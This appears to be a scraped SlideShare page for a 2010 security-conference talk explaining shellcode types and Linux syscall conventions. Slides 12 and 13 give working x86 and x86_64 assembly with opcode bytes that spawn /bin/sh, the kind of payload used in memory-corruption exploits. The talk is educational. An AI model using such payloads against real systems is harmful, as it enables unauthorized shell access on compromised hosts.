Design and
Implementation of
Shellcodes
Amr Ali
Cairo Security Camp 2010
What is a shellcode?
• It's bytecode
• Machine language
• Compiled Assembly source file
• A string of mostly unprintable c...
Types of Shellcodes
• Local shellcode
• Remote shellcode
• Download and execute shellcode
• Egg-hunt shellcode
• Omelet sh...
Local shellcode
System
+
Normal User Privs
Shellcode
Vulnerable
Root
Process
System
+
Root Privs
Remote shellcode
Network
Shellcode
Vulnerable
Remote
Service
System
+
Root Privs
Download and execute shellcode
Any Medium
Shellcode
Vulnerable
Anything
Payload on the
Internet
System
Downloads
Runs
Payl...
Egg-hunt shellcode
Vulnerable
Process
Egg-hunt
Shellcode
Shellcode
Unpredictable
location
Omelet .....?
Omelet shellcode
Egg-hunt
Shellcode
Shellcode
Chunk
Vulnerable
Process
Shellcode
Chunk
Shellcode
ChunkShellcode
Chunk
x86 and Linux kernel ABI
EAX : Holds the system call number.
EBX : Contains the value or address of the 1st
argument to th...
x86_64 and Linux kernel ABI
RAX : Contains the system call number.
RBX : General purpose register.
RCX : General purpose r...
x86 shellcode
.global _start
_start:
cltd # 0x99
push %edx # 0x52
push $0x68732f2f # 0x68 0x2f 0x2f 0x73 0x68
push $0x6e69...
x86_64 shellcode
.global _start
_start:
cltd # 0x99
push %rdx # 0x52
movq $0x68732f6e69622f2f, %rbx # 0x48 0xbb 0x2f 0x2f ...
Information
• Smashing the stack for fun and profit
by Aleph1
http://www.phrack.org/issues.html?issue=49&id=14
• Shellcode...
Thanks
Questions?
All presented material today will be available
on my website.
http://amr-ali.co.cc
Upcoming SlideShare
Loading in …5
×

Design and Implementation of Shellcodes.

430 views

Published on

How shellcodes are working and how they are created.

Published in: Internet, Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
430
On SlideShare
0
From Embeds
0
Number of Embeds
38
Actions
Shares
0
Downloads
12
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Design and Implementation of Shellcodes.

  1. 1. Design and Implementation of Shellcodes Amr Ali Cairo Security Camp 2010
  2. 2. What is a shellcode? • It's bytecode • Machine language • Compiled Assembly source file • A string of mostly unprintable characters • Opcodes that the processor executes directly • Mostly doesn't contain NULL bytes • It is position independent
  3. 3. Types of Shellcodes • Local shellcode • Remote shellcode • Download and execute shellcode • Egg-hunt shellcode • Omelet shellcode
  4. 4. Local shellcode System + Normal User Privs Shellcode Vulnerable Root Process System + Root Privs
  5. 5. Remote shellcode Network Shellcode Vulnerable Remote Service System + Root Privs
  6. 6. Download and execute shellcode Any Medium Shellcode Vulnerable Anything Payload on the Internet System Downloads Runs Payload
  7. 7. Egg-hunt shellcode Vulnerable Process Egg-hunt Shellcode Shellcode Unpredictable location
  8. 8. Omelet .....?
  9. 9. Omelet shellcode Egg-hunt Shellcode Shellcode Chunk Vulnerable Process Shellcode Chunk Shellcode ChunkShellcode Chunk
  10. 10. x86 and Linux kernel ABI EAX : Holds the system call number. EBX : Contains the value or address of the 1st argument to the system call. ECX : Contains the value or address of the 2nd argument to the system call. EDX : Contains the value or address of the 3rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register.
  11. 11. x86_64 and Linux kernel ABI RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3rd argument for the system call. RDI : The 1st argument for the system call. RSI : The 2nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4th argument for the system call. R9 : The 5th argument for the system call. R10 : The 6th argument for the system call. R11 – R15 : General purpose registers.
  12. 12. x86 shellcode .global _start _start: cltd # 0x99 push %edx # 0x52 push $0x68732f2f # 0x68 0x2f 0x2f 0x73 0x68 push $0x6e69622f # 0x68 0x2f 0x62 0x69 0x6e movl %esp, %ebx # 0x89 0xe3 push %edx # 0x52 push %ebx # 0x53 push %esp # 0x54 pop %edx # 0x5a movb $0x0b, %al # 0xb0 0x0b int $0x80 # 0xcd 0x80
  13. 13. x86_64 shellcode .global _start _start: cltd # 0x99 push %rdx # 0x52 movq $0x68732f6e69622f2f, %rbx # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 push %rbx # 0x53 movq %rsp, %rdi # 0x48 0x89 0xe7 push %rdx # 0x52 push %rdi # 0x57 movq %rsp, %rsi # 0x48 0x89 0xe6 push $0x3b # 0x6a 0x3b pop %rax # 0x58 syscall # 0x0f 0x05
  14. 14. Information • Smashing the stack for fun and profit by Aleph1 http://www.phrack.org/issues.html?issue=49&id=14 • Shellcode: the assembly cocktail by Samy Bahra http://www.infosecwriters.com/hhworld/shellcode.txt • The Shellcoder's Handbook
  15. 15. Thanks Questions? All presented material today will be available on my website. http://amr-ali.co.cc

×